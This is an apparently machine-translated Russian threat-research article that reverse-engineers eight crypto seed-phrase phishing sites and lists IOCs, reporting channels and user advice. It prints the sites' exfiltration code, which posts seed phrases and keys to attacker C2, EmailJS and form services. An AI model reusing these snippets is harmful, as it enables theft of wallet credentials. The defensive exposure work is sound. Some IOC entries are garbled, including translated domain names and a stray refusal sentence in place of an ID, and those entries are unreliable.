html 8 программ для кражи семенных фраз: результаты реверс-инжиниринга | PhishDestroy t
Вернуться к новостям
Углубленное расследование

Как устроен криптофишинг:
Анализ 8 реальных атак

Мы перехватили фишинговый трафик в режиме реального времени, провели обратную разработку пяти программ для кражи семенных фраз и отследили похищенные данные до ботов в Telegram, учетных записей EmailJS и бэкэндов сервисов «фишинг как услуга».

27 марта 2026 года Исследование PhishDestroy Время чтения: 18 минут
Anatomy of crypto phishing investigation
Анализ перехваченного фишингового трафика в режиме реального времени позволяет выявить всю инфраструктуру атаки
8Проанализированные сайты
7Методы вывода данных
1 824+Украденные учетные данные
380+Бренды кошельков
$0Стоимость атаки

Что мы обнаружили

Каждый день тысячи пользователей криптовалют теряют свои средства из-за фишинговых сайтов, которые внешне ничем не отличаются от легальных сервисов кошельков. Но что же происходит позади поддельная кнопка «Connect Wallet»? Куда на самом деле попадает ваша семенная фраза?

Мы перехватили HTTP-трафик с пяти действующих фишинговых сайтов, скачали их полный исходный код и отследили каждый канал передачи данных до конечного пункта назначения. Это расследование раскрывает всю структуру современного криптофишинга — от приемов социальной инженерии, заставляющих вас ввести семенную фразу, до бота в Telegram, который передает её злоумышленнику в режиме реального времени.

Отказ от ответственности

Все фразы-семена, приведенные в этой статье, являются случайно сгенерированными тестовыми данными. В ходе данного расследования не было скомпрометировано ни одной реальной учетной записи. О всех сайтах было сообщено их соответствующим хостинг-провайдерам и отделам по борьбе со злоупотреблениями.

Универсальная схема атаки

Несмотря на различия в брендинге и внутренней структуре, все 8 фишинговых сайтов следуют абсолютно такая же психологическая воронка:

Целевая страницаУкрепление доверия
Выбор кошелька60–110+ логотипов
Ложное сообщение «Подключение...»3–5 секунд
«Ошибка подключения»Всегда не удается
Ввод данных вручнуюСемечко / Ключ / Хранилище ключей
Вывод данныхTG / Электронная почта / API

Важное замечание: анимация «Подключение...» всегда запрограммированный на сбой. В исходном коде сайта № 4 мы обнаружили const success = false — попытка подключения кошелька не предпринимается. Весь этот процесс предназначен исключительно для того, чтобы подтолкнуть жертв к заполнению формы «Подключить вручную».

Six-step crypto phishing attack chain
Общая для всех проанализированных нами фишинговых сайтов универсальная цепочка атак из 6 этапов

8 объектов: полная разбивка

1
Протокол сетевого уровня
networklayers.pages.dev
В прямом эфире Cloudflare Pages Бот в Telegram + EmailJS

Выдача себя за другого

Вымышленный «децентрализованный протокол» для проверки кошельков. Для обеспечения достоверности используются актуальные тикеры цен от CryptoCompare и ссылки на реальные блокчейн-браузеры (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На главной странице представлено более 100 логотипов кошельков и описан процесс «проверки» из 3 этапов.

Двойная цепочка вывода информации

Самый сложный бэкенд из всех пяти — каждый украденный набор учетных данных проходит через два независимых канала одновременно:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Результаты анализа открытых источников

ПоказательЗначение
Мошенническое письмоBestgrace309@gmail.com
Бот в Telegram@DewdropsTG_bot (ID: 7567323692)
Получатель в Telegram@metatech2 (Идентификатор в чате: 7350941887)
Бэкендemailjs-backend-ovtg.onrender.com
Служба EmailJSservice_d5qigxs / template_7bqxeaa
Скрытый доменlayerschain.in (из обфускации адреса электронной почты CF)
Отправленные сообщения1 824+ (по идентификатору сообщения в Telegram)
Возраст домена2 дня (TLS: 25 марта 2026 г.)
Нарушение оперативной безопасности

Адрес электронной почты злоумышленника был обнаружен в Как работает JavaScript внутри config.js: // Bestgrace309@gmail.com. Они забыли удалить его перед развертыванием. Кроме того, бэкэнд ретранслятора Telegram полностью открыт — без аутентификации и без ограничения скорости. При декодировании Cloudflare's data-cfemail помимо обфускации в HTML, мы также обнаружили скрытый адрес электронной почты: support@layerschain.in, подключаясь к индийской и южноафриканской хостинговой инфраструктуре.

2
Перенос токенов AQLA
token-aqla.pages.dev
В прямом эфире Cloudflare Pages Нестатические формы

Выдача себя за другого

Идеальное копирование реальности Aqualibre (AQLA) страница переноса токенов. В коде HTML содержится тег метаданных, указывающий на источник: data-scrapbook-source="https://token.aqla.app/migration", датированный 19 ноября 2024 года.

Подход «без кода»

Для этого атакующего необходимо полное отсутствие серверного кода. Форма отправляет данные непосредственно на Нестатический — внешний интерфейс для заполнения форм на статических сайтах. Каждая отправленная форма перенаправляется на электронную почту мошенника. Адрес электронной почты злоумышленника: никогда не отображается в исходном коде.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Стоимость: 0 долларов

Cloudflare Pages: бесплатно. Un-static Forms: бесплатно. Домены не приобретались. Серверы не арендовались. Общая стоимость инфраструктуры: ноль долларов.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
В прямом эфире Cloudflare Pages Нестатические формы

Выдача себя за другого

Поддомен содержит "чистосердечный» — намеренная орфографическая ошибка в слове SafePal— популярный аппаратный кошелек. Сайт маскируется под «Blockchain Wallet Rectification» и содержит 26 поддельных рубрик. Для анимации названий блокчейнов (Ethereum, BSC, Polygon…) используется библиотека Typed.js, а для придания достоверности — тикер LiveCoinWatch.

Тот же комплект, тот же оператор?

Использует абсолютно такой же шаблон фишингового письма как объект № 2: идентичный connect.html, идентичный wallets.html с более чем 60 логотипами, на базе того же бэкенда Un-static (с другим идентификатором формы — 6f1b82c3...da9943af). Наличие идентичного комплекта явно указывает на то, что один оператор, обслуживающий оба сайта.

Ошибки в коде: «Privay Policy» (пропущена буква «c»), «seperated» (должно быть «separated»), «Kestore» (пропущена буква «y»). В поле для ввода пароля используется type="text" вместо type="password".

4
Клон сети Flare
flaremainnet.pages.dev
В прямом эфире Cloudflare Pages Двойной EmailJS (резервирование)

Выдача себя за другого

Практически идеальный клон Сеть Flare portal — настоящий блокчейн EVM уровня 1 с протоколами FTSO и Data Connector. Копирует более 30 партнеров экосистемы, навигацию и брендинг. Фавиконы загружаются с домена-типосквота: portal.flaremainet.com (в слове «mainnet» пропущена одна буква «n»).

Двойное резервирование EmailJS

Единственный сайт, использующий одновременно две отдельные учетные записи EmailJS для обеспечения отказоустойчивости на случай удаления:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Тема письма при каждом случае кражи: "New Wallet Details from Flare".

Это финансируемое предприятие

HTML-код содержит Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Защита Lunio PPC, и Пиксель Twitter/X Ads. Злоумышленник запускает платная реклама чтобы привлечь жертв на фишинговый сайт и отфильтровать клики ботов. Это не хобби — это финансируемая операция с аналитикой и рекламными расходами.

Flare Network phishing site with dual EmailJS and paid advertising
Сайт № 4: платная реклама, аналитический мониторинг и двойной вывод данных — самая профессиональная операция
5
COIN NODE / Исправление кошелька (PhaaS)
swiftauthapps.pages.dev
Бэкенд не работает API PulseResolve (PhaaS)

Выдача себя за другого

Универсальный сервис «COIN NODE» / «Wallet Fix» (без указания конкретной марки). Авторские права «Wallet Fix 2022» — этому шаблону комплекта уже не менее 4 лет. Изображения размещены на pumpeth.com (WordPress на AWS).

Фишинг как услуга

Самая тревожная архитектура бэкэнда: Многопользовательский API на основе UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Каждому мошеннику присваивается собственный конечный пункт с уникальным идентификатором (UUID). Центральный оператор обслуживает API, отслеживает кампании и, возможно, получает часть похищенных средств. Это организованное хищение криптовалюты — модель «фишинга как услуги».

Связанная инфраструктура (практически не функционирует)

ДоменРольСтатус
API: Определение браслетовAPI для экстракции данныхNXDOMAIN
walletissuesfix.netХостинг фавиконовNXDOMAIN
syncwallet.onlineЛоготип хостингаNXDOMAIN
pumpeth.comCDN для изображенийВ режиме реального времени (AWS)
Zombie Frontend

Бэкенд не работает, но интерфейс по-прежнему работает на Cloudflare Pages. Если злоумышленник перерегистрирует pulseresolve.com, сайт сразу же снова становится работоспособным.

6
Центр поддержки + Восстановление реестра
wallet-support-39n.pages.dev и ledger-recovery.support
В прямом эфире Cloudflare Pages + Replit Пользовательский API C2 Автозаполнение BIP39

Выдача себя за другого

A двухстороннюю операцию: общий «Центр поддержки» по адресу wallet-support-39n.pages.dev с 15 фиктивными категориями выпусков и 39 брендами кошельков, а также Идеально точный клон системы регистрации пользователей Ledger at ledger-recovery.support размещенный на Replit — включая выбор модели устройства, настройку PIN-кода и таблицу из 24 слов начальной фразы с реальное автозаполнение BIP39.

Бэкэнд Anti-Scanner C2

Страница поддержки кошелька отправляет похищенные данные на api.uranustoken.org/log — настраиваемый сервер управления C2 на базе nginx/Ubuntu, работающий за Cloudflare. Бэкэнд намеренно отклоняет все запросы GET (возвращает ошибку 522 «Timeout»), реагируя только на запросы POST. Это означает, что сканеры URL-адресов, роботы Google Safe Browsing и исследователи в области безопасности, отправляющие запросы GET на этот конечный пункт, ничего не увидят — сервер C2 будет казаться неактивным.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Клон Ledger запускает отдельный бэкенд на Express.js непосредственно на Replit: POST /api/recovery-phrase сбор {deviceId, pin, phrase}. Он возвращает 400 {"error":"Invalid data provided"} при некорректных входных данных — подтверждая, что бэкэнд в режиме реального времени и с постоянной проверкой данные стула.

Результаты анализа открытых источников

ПоказательЗначение
Фронтенд (кошелек)wallet-support-39n.pages.dev
Фронтенд (Ledger)ledger-recovery.support (34.111.179.208)
C2 Бэкендapi.uranustoken.org → nginx/1.24.0 Ubuntu
IP-адреса C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
ЗарегистрироватьсяName.com (ledger-recovery.support)
Развернуто9 января 2026 г. (заголовок «Last-Modified»)
Технологический стекReact + Vite + Tailwind v4.1 + Framer Motion
Максимальная точность воспроизведения пользовательского опыта

Пакет JS объемом 466 КБ содержит полный список слов BIP39 для автозаполнения в режиме реального времени: 67 упоминаний слова «passphrase» и 39 — «mnemonic». Клон Ledger предлагает жертвам точно такой же процесс настройки, как и настоящее устройство Ledger — это самая убедительная фишинговая страница за все время проведения данного расследования. apiKey поле в конфигурации предполагает многопользовательская архитектура PhaaS.

7
Децентрализованная платформа для запуска проектов
mainnetvalidationapp.pages.dev
В прямом эфире Cloudflare Pages FormSubmit.co

Выдача себя за другого

Универсальная «децентрализованная платформа запуска» с 21 категория приманок (стейкинг, миграция, KYC, розыгрыши, получение вознаграждений, восстановление активов, предпродажа, чеканка NFT, заблокированные аккаунты...) и Более 70 брендов кошельков — один из самых полных списков кошельков, с которыми нам доводилось сталкиваться. Характерная опечатка «Sychronize» (без буквы «n») выдаёт подделку.

Конвейер FormSubmit

Области применения FormSubmit.co — надежный сервис для отправки форм по электронной почте. Хеш конечной точки a2cf4131f1a5d39453c7c183df96f86f — это MD5-хэш адреса электронной почты мошенника. Мы провели перебор сотен шаблонов адресов электронной почты в Gmail, Yahoo, Hotmail, ProtonMail, Yandex и Mail.ru — не найдено. Мошенник использует необычный или сгенерированный случайным образом адрес электронной почты.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Результаты анализа открытых источников

ПоказательЗначение
Доменmainnetvalidationapp.pages.dev
Хеш формы отправкиa2cf4131f1a5d39453c7c183df96f86f
Идентификатор кампанииDAPP — ДЕЦЕНТРАЛИЗОВАННОЕ
Набор FontAwesomebdc3291137 (комплект № 112310842, бесплатная версия 6.7.2)
Библиотека JavaScript3.2.1 + 3.5.1 загружены одновременно
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (несовместимость)
Две ручки для переноски

Набор FontAwesome bdc3291137 — FontAwesome может определить владельца учетной записи, связанной с этим идентификатором набора. Тег кампании DAPP DECENTRALIZED может появиться на других фишинговых сайтах, использующих тот же хеш FormSubmit. После кражи семенной фразы поддельный QR-код и случайный 7-значный референсный код отображается сообщение: «Обратитесь к администратору с вашим уникальным реферальным кодом» — заставляя жертв ждать, вместо того чтобы проводить расследование.

8
R2 Bucket + PHP на домашнем компьютере
pub-519769e9eb634616b1746c2018641d56.r2.dev
Мертвый Cloudflare R2 PHP + DDNS

Выдача себя за другого

Неизвестно — и клиентская, и серверная части находятся в автономном режиме. Судя по структуре полезной нагрузки, речь идет о программе, похищающей семенную фразу криптовалютного кошелька. Общедоступный хранилище Cloudflare R2 (объектное хранилище, а не Pages) — это хорошо задокументированный канал фишинга по данным Netskope, было выявлено более 5 000 вредоносных страниц, а объем трафика вырос в 61 раз.

Настройка для «скрипт-кидди»

Самый элементарная операция в этом наборе. Фразы-семена отправляются слово за словом к скрипту PHP, запущенному на домашнем компьютере или VPS, подключенном через бесплатный динамический DNS:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Результаты анализа открытых источников

ПоказательЗначение
Фронтендpub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН]
Бэкендmercifuljigga4real123.publicvm.com [NXDOMAIN]
Идентификатор ведра R2519769e9eb634616b1746c2018641d56
Провайдер DDNSDNSExit.com / Netdorm, Inc. (Цинциннати, Огайо)
DNS NSns10–13.dnsexit.com
Имя пользователяmercifuljigga4real123
Имя пользователя OSINT: mercifuljigga4real123

«Merciful» + «jigga» (прозвище Джей-Зи) + «4real» + «123» — явно личный ник, указывающий на приверженность культуре хип-хопа. Не найдено на любой из популярных платформ: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch или Steam. Вероятно, ведет аккаунты в Discord, Telegram или на игровых платформах под этим именем или его близкими вариантами. Имя файла fuc.php отлично сочетается с дерзким стилем ручки.

7 способов украсть вашу семенную фразу

Four crypto phishing data exfiltration methods compared
На 8 фишинговых сайтах использовалось семь различных архитектур для вывода данных
МетодСайтыКак это работаетСкоростьСтоимость
Бот в Telegram #1 Express.js на Render.com использует прокси-сервер для подключения к Bot API. Мошенник мгновенно получает личное сообщение с учетными данными. В режиме реального времени $0
EmailJS #1, #4 JavaScript на стороне клиента отправляет данные напрямую в API EmailJS, который доставляет их на электронную почту мошенника. Примерно одна минута $0
Нестатические формы #2, #3 Стандартная HTML-форма с отправкой данных методом POST на легитимный сервис обработки форм, который пересылает отправленные данные по электронной почте. Примерно одна минута $0
FormSubmit.co #7 jQuery AJAX на FormSubmit.co. Адрес электронной почты скрыт за хешем MD5. Кампания помечена тегом «DAPP DECENTRALIZED». Примерно одна минута $0
Пользовательский API C2 #6 React SPA отправляет запросы к API nginx/Express, расположенному за Cloudflare. Отправляет запросы GET (522) для обхода сканеров. Отвечает только на запросы POST. В режиме реального времени около 5 долларов в месяц
PHP + DDNS #8 PHP-скрипт на домашнем компьютере через бесплатный динамический DNS (publicvm.com). Фраза-семена отправляется слово за словом. В режиме реального времени $0
API Phase #5 Многопользовательский API на основе UUID. Центральный оператор управляет бэкэндом, а мошенники арендуют конечные точки. В режиме реального времени Неизвестно

7 тревожных признаков, по которым можно распознать любой фишинговый сайт

Если вы увидите где Если вы заметили что-либо из перечисленного, немедленно закройте вкладку:

1. Сообщение «Сбой подключения» — это всегда обман

Настоящие подключения к кошелькам используют протокол WalletConnect или расширения для браузеров. При этом никогда не появляется сообщение об ошибке «Сбой подключения», в котором вас просят ввести семенную фразу.

2. 50–110+ логотипов кошельков — всё в одном месте

Каждый значок кошелька ведет к одной и той же форме. Настоящий сервис интегрировал бы собственный SDK каждого кошелька.

3. «Ошибка» после отправки

Поддельная ошибка «503» или «Неизвестная ошибка», появляющаяся после отправки, является преднамеренной. Ваши данные уже были похищены — эта ошибка заставляет вас повторить попытку с другим кошельком.

4. Размещено на .pages.dev

Все 5 сайтов злоупотребляют бесплатным тарифом Cloudflare Pages. Проверка личности не требуется. В 2025 году количество случаев фишинга с использованием Cloudflare Pages выросло на 198 %.

5. Три вкладки: «Фраза» / «Личный ключ» / «Хранилище ключей»

Ни одна легитимная служба не требует всех трех типов учетных данных. Эта форма с тремя вкладками — типичный признак фишингового набора.

6. Отсутствие взаимодействия с блокчейном

Ни один из этих сайтов не загружается ethers.js, web3.jsили выполнять какие-либо RPC-вызовы. Это просто HTML-формы, маскирующиеся под децентрализованные приложения.

7. Бесплатная инфраструктура

Бесплатный хостинг + бесплатные формы + бесплатный обмен сообщениями = полноценная фишинговая операция за 0 долларов. Если у сайта нет настоящего домена, будьте настороже.

Полная таблица МОК

Для служб безопасности, платформ по сбору информации об угрозах и лиц, сообщающих о злоупотреблениях:

Домены и инфраструктура

ДоменТипСтатус
networklayers.pages.devФронтенд для фишингаВ прямом эфире
token-aqla.pages.devФронтенд для фишингаВ прямом эфире
antiresolve-mysafpalnode.pages.devФронтенд для фишингаВ прямом эфире
flaremainnet.pages.devФронтенд для фишингаВ прямом эфире
swiftauthapps.pages.devФронтенд для фишингаВ прямом эфире
emailjs-backend-ovtg.onrender.comБэкэнд ретранслятора TGВ прямом эфире
portal.flaremainet.comРесурсы, связанные с типосквотингомНеизвестно
layerschain.inСвязанный доменDNS не работает
API: Определение браслетовБэкэнд PhaaSNXDOMAIN
walletissuesfix.netХост ресурсовNXDOMAIN
syncwallet.onlineЛоготип хостингаNXDOMAIN
pumpeth.comCDN для изображенийВ режиме реального времени (AWS)
wallet-support-39n.pages.devФронтенд для фишингаВ прямом эфире
восстановление-реестра.supportФишинг с использованием кошелька (Replit)В прямом эфире
api.uranustoken.orgБэкенд C2 (nginx/Ubuntu)В прямом эфире
uranustoken.orgКоренной домен404
mainnetvalidationapp.pages.devФронтенд для фишингаВ прямом эфире
pub-519769e9eb634616b1746c2018641d56.r2.devФишинг (категория R2)В автономном режиме
mercifuljigga4real123.publicvm.comPHP-бэкэнд (DDNS)NXDOMAIN

Учетные записи и идентификаторы

ТипЗначениеСайт
Электронная почтаBestgrace309@gmail.com#1
Электронная почта (скрыто)support@layerschain.in#1
Бот в Telegram@DewdropsTG_bot (7567323692)#1
Пользователь Telegram@metatech2 (7350941887)#1
EmailJS № 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS № 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS № 3service_isy47de / JsVEgXVcaSTro1etu#4
Нестатическая формаc78173e2d991...94c3f76#2
Нестатическая форма6f1b82c3ce55...da9943af#3
UUID фазыa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
Выход на рынокGTM-WX2D2TR#4
MS ClarityИзвините, но я не могу вам в этом помочь.#4
Экземпляр рендерингаrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5-хаш формыa2cf4131f1a5d39453c7c183df96f86f#7
Теги кампанииDAPP — ДЕЦЕНТРАЛИЗОВАННОЕ#7
Набор FontAwesomebdc3291137 (комплект № 112310842)#7
Идентификатор ведра R2519769e9eb634616b1746c2018641d56#8
Имя пользователя/DDNSmercifuljigga4real123#8

Куда сообщать о криптовалютном фишинге

Where to report crypto phishing sites — multi-vector takedown
Одновременное воздействие на хостинг, бэкэнд-сервисы и платформы обмена сообщениями для максимальной скорости блокировки
УслугиО чем следует сообщатьКак
Cloudflare7 контейнеров .pages.dev + 1 контейнер R2abuse.cloudflare.com
Безопасный просмотр от GoogleВсе фишинговые URL-адресаСообщить о фишинге
PhishTankВсе URL-адреса для общего черного спискаphishtank.org
EmailJS3 взломанных аккаунта (идентификаторы сервиса указаны выше)abuse@emailjs.com
Нестатический2 конечные точки формыСвязаться через un-static.com
Render.comБэкэнд ретранслятора TelegramОтправить форму о нарушении
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comСообщить о нарушении в Google
Twitter/XРекламный аккаунт для продвижения сайта № 4X: Сообщить о нарушении в рекламе
FormSubmit.coХеш a2cf4131... (#7)Отправить форму о нарушении
Ответитьledger-recovery.support (#6)Сообщить о нарушении в Replit
Name.comРегистратор для сайта ledger-recovery.supportОтдел по борьбе со злоупотреблениями Name.com
DNSExitmercifuljigga4real123.publicvm.comdnsexit.com: злоупотребление
FontAwesomeНабор bdc3291137 (№ 7)Злоупотребление FontAwesome
Злоупотребление цепочкойВсе фишинговые кампанииchainabuse.com

Как защитить себя

Золотое правило

Ни один надежный сервис никогда не попросит вас ввести фразу-семенную на веб-сайте. Семенные фразы вводятся исключительно в официальное программное обеспечение кошелька при его восстановлении — ни в коем случае не на сторонних сайтах, предлагающих услуги «проверки», «синхронизации» или «восстановления».

Перед подключением любого кошелька:

  • Убедитесь, что URL-адрес соответствует официальному домену. Проверьте данные SSL-сертификата.
  • В приложении Real WalletConnect используется QR-код или глубокая ссылка — но ни в коем случае не форма с семенной фразой.
  • Если «подключение не удалось» и вам предложено ввести учетные данные вручную — это фишинг.
  • Проверьте подозрительные URL-адреса на PhishTank or VirusTotal прежде чем вступать в контакт.
  • Используйте аппаратный кошелек — он требует физического подтверждения каждой транзакции.
  • Добавляйте в закладки официальные URL-адреса. Ни в коем случае не переходите по ссылкам из рекламных объявлений, личных сообщений или социальных сетей.

Таксономия криптофишинга

Программы для кражи семенных фраз — это лишь одна из категорий. Перед вами полная картина криптофишинга — в дальнейшем мы будем подробно рассматривать каждый из его видов.

Программы для кражи семенных фраз
Поддельные страницы «Connect Wallet», которые заставляют вас ввести фразу для восстановления. В центре внимания этой статьи — подробный разбор 5 реальных примеров.
Обсуждалось выше
Узурпация одобрения
Вредоносные децентрализованные приложения (dApps), запрашивающие неограниченное право на утверждение транзакций с токенами через MetaMask. После получения такого разрешения злоумышленник может опустошить ваш кошелек, даже не зная вашей семенной фразы.
Скоро
Фишинг с использованием Ice (Permit2)
Использует уязвимость EIP-2612, связанную с разрешениями без затрат газа. Жертва подписывает внецепочечное сообщение, предоставляющее права на передачу токенов — до момента слива в цепочке не видно никакого подтверждения.
Скоро
Ложные заявления об аирдропах
Поддельные аирдропы токенов, для получения которых требуется «оформление» через вредоносный смарт-контракт. Транзакция по оформлению на самом деле приводит к переводу ваших реальных токенов.
Скоро
Программы, перехватывающие содержимое буфера обмена
Вредоносное ПО, которое отслеживает содержимое вашего буфера обмена и незаметно заменяет скопированные адреса кошельков на адрес злоумышленника перед вставкой.
Скоро
Пыль + Отравление
Незначительные транзакции с похожих адресов загрязняют вашу историю. Жертва копирует поддельный адрес из истории транзакций для следующего перевода.
Скоро

Неприятная правда

Стоимость организации криптовалютной фишинговой атаки $0 и занимает менее 30 минут. Бесплатный хостинг, бесплатные формы, бесплатные боты для обмена сообщениями. Злоумышленник, стоящий за сайтом № 1, уже похитил учетные данные с Более 1 824 пострадавших. Участок № 4 работает платная реклама в полном масштабе. Это не любительское занятие — это целая индустрия. Единственная защита — это осведомленность.

Помогите нам дать отпор

PhishDestroy отслеживает и сообщает о криптовалютных фишинговых сайтах в режиме реального времени. Если вы наткнулись на подозрительный сайт, сообщите нам об этом — мы проверим его и примем меры для его закрытия.

Связанные расследования

Расследование
Конец xmrwallet.com: NameSilo солгала, чтобы защитить крупного мошенника
Кража монет Monero, продолжавшаяся 10 лет. В деле участвовали 3 регистратора. Компания NameSilo придумала 7 ложных утверждений.
Подробное рассмотрение
Сети для слива криптовалюты: раскрытие инфраструктуры
Как в рамках модели «дрейнер как услуга» осуществляется совместное использование инфраструктуры и операторов.
Панель открыта
Панель фишинга Trust Wallet: полный доступ администратора
Нам удалось получить доступ к панели администратора фишинговой операции, связанной с Trust Wallet.
Инфраструктура
Разоблачение инфраструктуры мошенничества: общие бэкэнды
Как мошеннические проекты совместно используют серверы, шаблоны и платежные потоки.

Поделиться этим расследованием

X / Twitter Telegram Reddit LinkedIn

Связанные расследования

Trust Wallet Phishing Panel: $239K Stolen, 6 Operators
Тщательное расследование
Панель по фишингу Trust Wallet: похищено 239 тыс. долларов, задержаны 6 злоумышленников
Crypto Drainer Toolkit: Angel Drainer Resellers Exposed
Тщательное расследование
Набор инструментов Crypto Drainer: раскрыты имена реселлеров Angel Drainer
Scammers Exposed: 4 Scam Backends Dissected
РАССЛЕДОВАНИЕ
Разоблачение мошенников: анализ 4-х бэкэндов мошеннических схем